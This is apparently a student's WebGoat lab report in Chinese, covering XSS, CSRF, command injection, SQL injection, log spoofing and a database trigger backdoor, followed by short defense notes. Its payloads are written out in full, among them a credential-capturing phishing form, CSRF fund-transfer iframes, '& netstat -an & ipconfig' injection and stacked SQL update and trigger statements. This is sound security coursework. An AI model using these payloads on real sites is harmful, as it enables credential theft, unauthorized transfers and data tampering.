2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

时间:2021-06-12 16:16:53

实践过程记录

  • 下载wegot并配置好java环境后

  • 输入java -jar webgoat-container-7.0-SNAPSHOT-war-exec.jar

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

  • 在浏览器输入localhost:8080/WebGoat,进入WebGoat开始实验

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

目录

XSS攻击

1.Phishing with XSS (网路钓鱼)

  • 在搜索框中输入XSS攻击代码,利用XSS可以在已存在的页面中进一步添加元素的特点。我们先创建一个form,让受害人在我们创建的form中填写用户名和密码,再添加一段JavaScript代码,读取受害人输入的用户名和密码,完整的XSS攻击代码如下:
</form>
<script>
function hack(){
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
  • 在搜索框中输入攻击代码后点击搜索,会看到一个要求输入用户名密码的表单

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

  • 输入用户名密码,点击登录,WebGoat会将你输入的信息捕获并反馈给你

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

2.Stored XSS Attacks

  • 创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容,输入标题,然后在message中输入一串代码,比如
<script>alert("20155230 attack succeed!");</script>
  • 提交后,再次点击刚刚创建的帖子,成功弹出窗口,说明攻击成功

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

3.Reflected XSS Attacks

  • 反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。

  • 我们将带有攻击性的URL作为输入源,例如依旧输入<script>alert("20155230 attack succeed!");</script>,就会弹出对话框

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

CSRF攻击

4.Cross Site Request Forgery(CSRF)

  • 查看页面右边Parameters中的src和menu值。

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

  • 我们在message框中输入这样一串代码<img src='attack?Screen=src值&menu=menu值&transferFunds=转账数额' width='1' height='1'>

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

  • 显示攻击成功

5.CSRF Prompt By-Pass

  • message框中输入代码,转走金额5230
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=转账数额"> </iframe>
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM"> </iframe>
  • 转出成功

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

Sql注入攻击

6.Command Injection

  • 这个题是要求能够在目标主机上执行系统命令,我们可以通过火狐浏览器下的一个扩展Firebug(就是右上角的小虫的标志)对源代码进行修改,若无Firebug,可在火狐浏览器添加工具中下载、安装、添加。例如在BackDoors.help旁边加上"& netstat -an & ipconfig"

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

  • 选中修改后的值再点view,可以看到命令被执行,出现系统网络连接情况:

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

7.Numeric SQL Injection

  • 通过注入SQL字符串的方式查看所有的天气数据,加上一个1=1这种永真式即可达到我们的目的,利用firebug,在任意一个值比如101旁边加上or 1=1

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

  • 选中Columbia,点Go,可以看到所有天气数据:

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

8.Log Spoofing

  • 我们输入的用户名会被追加到日志文件中,所以我们可以使用障眼法来使用户名为admin的用户在日志中显示“成功登录”,在User Name文本框中输入20155230%0d%0aLogin Succeeded for username: admin,其中%0d是回车,%0a是换行符:

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

  • 攻击成功

9.String SQL Injection

  • 构造SQL注入字符串,在文本框中输入' or 1=1 --:

  • 点击GO,可以查看到所以信息:

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

10.Database Backdoors

  • 先输一个101,得到了该用户的信息:

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

  • 可以发现输入的语句没有验证,很容易进行SQL注入,输入注入语句: 101; update employee set salary=5230 ,成功把该用户的工调整到了5230

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础

  • 接下来使用语句 101;CREATE TRIGGER lxBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='12345678@qq.com' WHERE userid = NEW.userid 创建一个后门,把表中所有的邮箱和用户ID都改写:

    2017-2018-2 20155230《网络对抗技术》实验9:Web安全基础


实验后回答问题

  • SQL注入攻击原理,如何防御

    • SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的。
    • 防御措施
      • 普通用户与系统管理员用户的权限要有严格的区分。
      • 强迫使用参数化语句。
      • 加强对用户输入的验证。
  • XSS攻击的原理,如何防御

    • XSS攻击是Web攻击中最常见的攻击方法之一,它是通过对网页注入可执行代码且成功地被浏览器

      执行,达到攻击的目的,形成了一次有效XSS攻击,一旦攻击成功,它可以获取用户的联系人列

      表,然后向联系人发送虚假诈骗信息,可以删除用户的日志等等。
    • 防御措施
      • 过滤用户输入的检查用户输入的内容中是否有非法内容。如<>(尖括号)、”(引号)、 ‘(单引号)、%(百分比符号)、;(分号)、()(括号)、&(& 符号)、+(加号)等。严格控制输出
  • CSRF攻击原理,如何防御

    • 跨站请求伪造,盗用身份发送恶意请求。
    • 防御措施
      • 验证 HTTP Referer 字段
      • 在请求地址中添加 token 并验证

实验总结与体会

  • 学习到了很多攻击类型,更加深入的了解很多。但是这个软件是英文版本,用起来挺费劲的。

  • 在学习sql注入时看源码看的怀疑人生,字是真的有点小,还不知道怎么放大。。。但是在看代码的同时也算是复习了上学期的Web知识。也深深领会到了代码质量的重要性。对XSS和CRSF也有了一定的认识!